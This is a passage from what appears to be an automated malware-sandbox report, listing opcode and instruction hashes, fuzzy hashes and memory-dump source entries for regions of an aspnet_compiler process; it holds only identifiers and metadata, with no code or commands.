                                                                                                        • Opcode ID: 52d0cce3379df67ff8a4c00ee425c1dbb14e71a3f3884cc5b231e82a6dd045e0
                                                                                                        • Instruction ID: 532e677e902d3c17e1337b029830666427cb20bd42d215892ae3b1948f174586
                                                                                                        • Opcode Fuzzy Hash: 52d0cce3379df67ff8a4c00ee425c1dbb14e71a3f3884cc5b231e82a6dd045e0
                                                                                                        • Instruction Fuzzy Hash: 1F312172600604AFCB21EF18D880A66BBA5FF85364F244669ED458B292D731ED46CBE0
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: e5baa402a38d87b00329ff89886d8ab6443b0d0dd08ede9635cfb6b837f2a7ea
                                                                                                        • Instruction ID: 9200e11761bd0d853ebc05e42d2625bec5fefcf9fbe3c7a9a65dd1880af51ecb
                                                                                                        • Opcode Fuzzy Hash: e5baa402a38d87b00329ff89886d8ab6443b0d0dd08ede9635cfb6b837f2a7ea
                                                                                                        • Instruction Fuzzy Hash: 4A31D275A0012ABBDB15DF98CC44BAEB7B5FB45B40F554168E900EB244EB70EE40CB90
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 3feb826c68ea9112465fba4de372b6dd5350a86babe0bafa886070852a3760f0
                                                                                                        • Instruction ID: 140a3ec6a8ca0f287b00601a0e714d406511b6e7dc78559d9470bec0c66ed944
                                                                                                        • Opcode Fuzzy Hash: 3feb826c68ea9112465fba4de372b6dd5350a86babe0bafa886070852a3760f0
                                                                                                        • Instruction Fuzzy Hash: 5B31F971700A1AEFDB129F5DC890B6EB7B9AF55754F20406DE509EB342EE30DE008B90
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 202bbf50b524792b6a6a0dc49cde574b617617469b65880a7174eaf516c7bd55
                                                                                                        • Instruction ID: ba17261be351faaaf0d5431e2106c3b486a0b06ca5ac68c5e5142df28eb6b424
                                                                                                        • Opcode Fuzzy Hash: 202bbf50b524792b6a6a0dc49cde574b617617469b65880a7174eaf516c7bd55
                                                                                                        • Instruction Fuzzy Hash: E1318C726093018FE760DF19C844B2AFBE9FF98700F55496DE9849B392D770E944CBA2
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 0d636d907e1842cde3c8614711c17b8334d9039cc6d41882c0c3bfca4fd857e2
                                                                                                        • Instruction ID: 6bcab2f8f6a2140d7e1cd58bc97416f64ac97b24d9c9489622f081113b9f8a8f
                                                                                                        • Opcode Fuzzy Hash: 0d636d907e1842cde3c8614711c17b8334d9039cc6d41882c0c3bfca4fd857e2
                                                                                                        • Instruction Fuzzy Hash: 2F310232B002059FD724DFB8C888A6EFBFAABC4304F548629D106D3254E771D941CB91
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 2963604b138b45d82781e0a3e479f75d70978de019cd50ff7a7906112cbdd64f
                                                                                                        • Instruction ID: 444d640126def3b5e41a2f249a60f8e7b6c01405d9bf08e39ad034f36f3fab38
                                                                                                        • Opcode Fuzzy Hash: 2963604b138b45d82781e0a3e479f75d70978de019cd50ff7a7906112cbdd64f
                                                                                                        • Instruction Fuzzy Hash: 3B31ABB160820A8FCB02EF28D84495ABBE9FF99714F000569FD51D73A2DB30DD15CBA2
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: c5108e3738c51dca5451eec049ec66bf2175edc1bac04e7a68cfa9c53da4afeb
                                                                                                        • Instruction ID: 517c59152b39763b462e5a93f566155737d8aa61cc5ecb30e52614b475483131
                                                                                                        • Opcode Fuzzy Hash: c5108e3738c51dca5451eec049ec66bf2175edc1bac04e7a68cfa9c53da4afeb
                                                                                                        • Instruction Fuzzy Hash: E13127B15002059BDB31AF6CC844BA9FBB4EF50314F9481E9D9499B386EA34DA86CF90
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                                                                        • Instruction ID: 2ff44218249816df1510c32c43ea109d0741078484aa67de1442fdb84ea46978
                                                                                                        • Opcode Fuzzy Hash: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                                                                        • Instruction Fuzzy Hash: 85212D3660065266CF15ABA99844ABAFFB4EFC0710F44841FFAD5DB591E734DA40C3E1
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 640cd05b6e544c51cf22c24a68d18d0fe75eebfb0c0f2039fd49460508cb59fa
                                                                                                        • Instruction ID: 7f31132332863c7f9654bf344cc5a3e3844645cb4176e86677960e14c519dc15
                                                                                                        • Opcode Fuzzy Hash: 640cd05b6e544c51cf22c24a68d18d0fe75eebfb0c0f2039fd49460508cb59fa
                                                                                                        • Instruction Fuzzy Hash: 8631D431A0052C9BDF31DB18CC45FEEF7B9AB15740F0101E5F655AB290DA749E808F90
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                                                                        • Instruction ID: e9ae08a1f276f4322ebc396e1995c080036b87c83265af641379895cd3363eb6
                                                                                                        • Opcode Fuzzy Hash: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                                                                        • Instruction Fuzzy Hash: 27216031A00609EBCB15CF58C9C4ADAFBA5FF48718F108069EE169B246D771EA458B90
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 51725e9912d0b02923400aeafe8ce182984a0a85f330f353f5d920ad956dc847
                                                                                                        • Instruction ID: 7253751ea96f10ee794ec3236dfee372e5b26438f3112d5008070b4afdf29781
                                                                                                        • Opcode Fuzzy Hash: 51725e9912d0b02923400aeafe8ce182984a0a85f330f353f5d920ad956dc847
                                                                                                        • Instruction Fuzzy Hash: 1521D572604B459BCB21CF18C880BABF7E5FF88760F104519FD569B646D730EA00CBA2
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                                                                        • Instruction ID: 814f51a40f4bd81bb72ba5480244f4d8db63d4752ba46c63b3ed2a4ec091cb42
                                                                                                        • Opcode Fuzzy Hash: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                                                                        • Instruction Fuzzy Hash: 52317A31600605EFEB21CFA8C984F6AB7B9EF85354F1445A9E552CB290EB30EE41CB91
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 77fe9d51865b4aad3a5b92d399ad0ab68e002ccb43a235bbcdc0c50bb77402ff
                                                                                                        • Instruction ID: 65d6b24803ad57c8dca4f71467b994112951d4d7584ce7dc0365e4a301e4c68d
                                                                                                        • Opcode Fuzzy Hash: 77fe9d51865b4aad3a5b92d399ad0ab68e002ccb43a235bbcdc0c50bb77402ff
                                                                                                        • Instruction Fuzzy Hash: 682124715047019BDB20FBA8D988F57F7E8AF64798F100829FA05C7295FB30D908CBA2
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: e1acee25a86a18db778833508db53c8429f7f2c8d9f42c0ea70f9f679245ea3d
                                                                                                        • Instruction ID: 7b8db29563787eab49fac90ab4f2f158a2115d66a8da0024535585c23b3193a7
                                                                                                        • Opcode Fuzzy Hash: e1acee25a86a18db778833508db53c8429f7f2c8d9f42c0ea70f9f679245ea3d
                                                                                                        • Instruction Fuzzy Hash: D6219D722012019FD719DF29C845B6AFBE9EF95365F55826DE10A8B290EBB0E801CB94
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2105673675.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 1a779c0711f6215bcc958aa1f548cc0691e242a1ea3ac3ddcc3c18364968f122
                                                                                                        • Instruction ID: cbab8eb73ab364ad6eb2ddef97e47c61682118c1080dc952aea5b34298b07704
                                                                                                        • Opcode Fuzzy Hash: 1a779c0711f6215bcc958aa1f548cc0691e242a1ea3ac3ddcc3c18364968f122
                                                                                                        • Instruction Fuzzy Hash: 22116D35A0020DAFDB15DF64C854EAEBBB5EB84740F00409DEA069B390E635AE11CB90
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: b42c7e2ae50e03a7726885668eff56b9345d02c464d81d399d5287f2e5f5e072
                                                                                                        • Instruction ID: e09348935da24886f25a79af05c5f5f359f22f5eb7238c67c3ddcc7bda6e537c
                                                                                                        • Opcode Fuzzy Hash: b42c7e2ae50e03a7726885668eff56b9345d02c464d81d399d5287f2e5f5e072
                                                                                                        • Instruction Fuzzy Hash: 8E01F771201A41BFD711BB39DD84E53F7ACFF956647100629B209C3662DB34EC05C6E0
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 16eb1e9227c9ca53ee971aeba792c6b4be561f846bb8a1c766c052503132072f
                                                                                                        • Instruction ID: 26d681064e59ba3c9d27d15f9eada5a1bcbd6eef5e1741adcbdb475bb6397067
                                                                                                        • Opcode Fuzzy Hash: 16eb1e9227c9ca53ee971aeba792c6b4be561f846bb8a1c766c052503132072f
                                                                                                        • Instruction Fuzzy Hash: 48118E32401A029FDB229E15C880B22F7E4BF5077AF15886DD6994A4A6C374E880CB10
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 2103513d2fbd223765d54b27d59d1ce24549dd4e977acd5ce3c70b0a80ca45ab
                                                                                                        • Instruction ID: 332bf90bff1acc20d42173ef65583cf8f201912d0da04f2769d325b831e50455
                                                                                                        • Opcode Fuzzy Hash: 2103513d2fbd223765d54b27d59d1ce24549dd4e977acd5ce3c70b0a80ca45ab
                                                                                                        • Instruction Fuzzy Hash: 13014772A085849BDB219B98E840FE6F7A9EB84B38F104159FE158B380EB34D940C791
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 5807426d3854de8340053ba828383e613f6f2126caef2cc0c9319ce74fae2529
                                                                                                        • Instruction ID: bf71ad435fe608180bd95f142a5d6f3bd9cb4e072e6aec757a756ea96453aa03
                                                                                                        • Opcode Fuzzy Hash: 5807426d3854de8340053ba828383e613f6f2126caef2cc0c9319ce74fae2529
                                                                                                        • Instruction Fuzzy Hash: 1D01D136300105ABCF129EAADC44EABFFACBFC5650B144529BA06DB220EA34DD42C760
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 036d74db3c94e76e6d869ecacd14549a10cc76cd84bce114b8183a7e2235d31e
                                                                                                        • Instruction ID: 0f7a7d988aa72a703dfce27306595e0a64730de0fbf60ddccd2d83fbb7c56b83
                                                                                                        • Opcode Fuzzy Hash: 036d74db3c94e76e6d869ecacd14549a10cc76cd84bce114b8183a7e2235d31e
                                                                                                        • Instruction Fuzzy Hash: 7B017171A00249EFDB14EFA9D855FEEBBF8EF44704F04446ABA00EB290D674DA41CB95
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 60ad5bd81e7debbfbdabab7f1e38988a41307fc95436d332005be736874dea79
                                                                                                        • Instruction ID: 2729c42b66e908049d69dd7028cf1f6988631ad273d24d8b7148805c5f273ada
                                                                                                        • Opcode Fuzzy Hash: 60ad5bd81e7debbfbdabab7f1e38988a41307fc95436d332005be736874dea79
                                                                                                        • Instruction Fuzzy Hash: 0F019E71A00249ABCB14EF69D845FAEBBB8EF84714F04402ABA00EB280D674DA41CB95
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                                                        • Instruction ID: 50460adacf6180da46ca3a4a6e4f87a1cd0ade287500868de1105fe8ec1ae6cc
                                                                                                        • Opcode Fuzzy Hash: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                                                        • Instruction Fuzzy Hash: 64018F32204584DFE726C71DDA48F36FBE8EF45794F1904A1FA05CB691EA38DC40C661
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: f9098340cdb1bb7e1fefc2e5daf1fab4c8851ef24990368a2e1d04921bc306d0
                                                                                                        • Instruction ID: a51c77a8209828e6d87ac93fe58767432dc10535812a6d71c03e8e992da46bf6
                                                                                                        • Opcode Fuzzy Hash: f9098340cdb1bb7e1fefc2e5daf1fab4c8851ef24990368a2e1d04921bc306d0
                                                                                                        • Instruction Fuzzy Hash: 120184316045099BDB14DB69DC4C9AAFBB9EF85720F1540699D01EB684EE20DA01C692
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 5c95e9fc6a046b09580dc7496d0a01b2f20c20fe8a0c7d7430b9b257e78f1209
                                                                                                        • Instruction ID: efed0551104b57951abbe88af9e10fd7d58e550bfb6bb90ec775af48ec04801a
                                                                                                        • Opcode Fuzzy Hash: 5c95e9fc6a046b09580dc7496d0a01b2f20c20fe8a0c7d7430b9b257e78f1209
                                                                                                        • Instruction Fuzzy Hash: 02018471A00259EBDB10EBA9D859FAFBBB8EF94704F04406AB501EB280D674DA00C794
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: a8c9d65435b73452097145c96de55d982d85c89e78f0c73e48ef3e3e06b88e8c
                                                                                                        • Instruction ID: 729205f0519fa6a3654c955d108cf2812e120d90caff0629dbf8b50c2ab1f52c
                                                                                                        • Opcode Fuzzy Hash: a8c9d65435b73452097145c96de55d982d85c89e78f0c73e48ef3e3e06b88e8c
                                                                                                        • Instruction Fuzzy Hash: 83F0F932681A10B7C7319B5A8C44F07FAA9EB84B91F144069E60597640C670DD01C6B0
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 028c249cd0ba4e6ebdd9da7a58a247c0d8b79b97278eed4440696ad5e2a8f353
                                                                                                        • Instruction ID: 69ecb2153bab621d7fe2b9b3843ee3ba7d084f6e4dce59bbb8f3edaa7ae33ed6
                                                                                                        • Opcode Fuzzy Hash: 028c249cd0ba4e6ebdd9da7a58a247c0d8b79b97278eed4440696ad5e2a8f353
                                                                                                        • Instruction Fuzzy Hash: 8B012C71A1060DABDB00DFA9D9559EEBBF8FF58704F10405AE901E7350D734EA018BA0
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                                                        • Instruction ID: 3e3fccbc149def7af1529b8ad23c2ef88b09f858b39f6461c0b0c91902113d53
                                                                                                        • Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                                                        • Instruction Fuzzy Hash: 5EF0C2B2600A11ABD325CF4DDC40E57FBEADBD5B80F048129A645CB320EA31DD04CB90
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 4b144fee8e302da9bd7a44c91ba9830cd212b1862176d061d079db00ed1b33d0
                                                                                                        • Instruction ID: 47ec1b02f1093cc320cf776cc1f9c9f1f9ea0280b727a3e8688d44db633a714e
                                                                                                        • Opcode Fuzzy Hash: 4b144fee8e302da9bd7a44c91ba9830cd212b1862176d061d079db00ed1b33d0
                                                                                                        • Instruction Fuzzy Hash: 58012CB1A0020DABDB00DFA9D9559EEBBF8FF59744F50405AE901F7390E674EA018BA0
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 3d139a8f84bdcb550a027a5548d8129261062d0e6c1b8bcb6e62c612f5573554
                                                                                                        • Instruction ID: 3171054373106173f630aa8bbdf33dfeb35ee351710596bc31b8ac882a3b234d
                                                                                                        • Opcode Fuzzy Hash: 3d139a8f84bdcb550a027a5548d8129261062d0e6c1b8bcb6e62c612f5573554
                                                                                                        • Instruction Fuzzy Hash: 97012C71A1020DABCB04DFA9D9959EEBBF8FF58714F10405AF901E7351D634EA418BA0
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                                                        • Instruction ID: 9e56693ba297bfe2c008b1c31abc7e88710034b5ffd1986799cb0b4c6374b00c
                                                                                                        • Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                                                        • Instruction Fuzzy Hash: 92F0FC33304A239BDF3316A95C44B3BE9959FD9A64F190035E7199B244C9648E0156D2
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 4c7214c07e2d47acdf30c8ad2cd8abe64377b7c52b5a775f25a42b7b733d5d35
                                                                                                        • Instruction ID: 7ec812d2aad47be6125b24696776d7c80efe7e83fbf4f2d0f7ba3f1603aa4e59
                                                                                                        • Opcode Fuzzy Hash: 4c7214c07e2d47acdf30c8ad2cd8abe64377b7c52b5a775f25a42b7b733d5d35
                                                                                                        • Instruction Fuzzy Hash: 86110970A1024ADFDB44DFA9D555AADFBF4FF08704F04426AE909EB382E634DA418B90
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 0739ce39e09f5d6752240038e7d37c1cc72ceff38fb0ef33def618a44503e3a1
                                                                                                        • Instruction ID: 9ac65613f759d1e9ef23e457c5cdbd36bbe1b1f57884bdb2d5cabcc518b2bf5e
                                                                                                        • Opcode Fuzzy Hash: 0739ce39e09f5d6752240038e7d37c1cc72ceff38fb0ef33def618a44503e3a1
                                                                                                        • Instruction Fuzzy Hash: C1018F71A002499BCB00DFA9D855AEEBBF8FF58714F14405EE901EB280E734EA01CB94
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 09a248a6d1ca77e5f565f2b03f52145557067ed977208658029e4ade031c7a6a
                                                                                                        • Instruction ID: 7482bbe4e59c8d9e822832ef2bacc186c670478e50e7fe72290d2cad35e5447e
                                                                                                        • Opcode Fuzzy Hash: 09a248a6d1ca77e5f565f2b03f52145557067ed977208658029e4ade031c7a6a
                                                                                                        • Instruction Fuzzy Hash: F3F0C872F10248ABDB14DFB9D819AEEF7B8EF44710F04805AE501EB290DA74DA018791
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
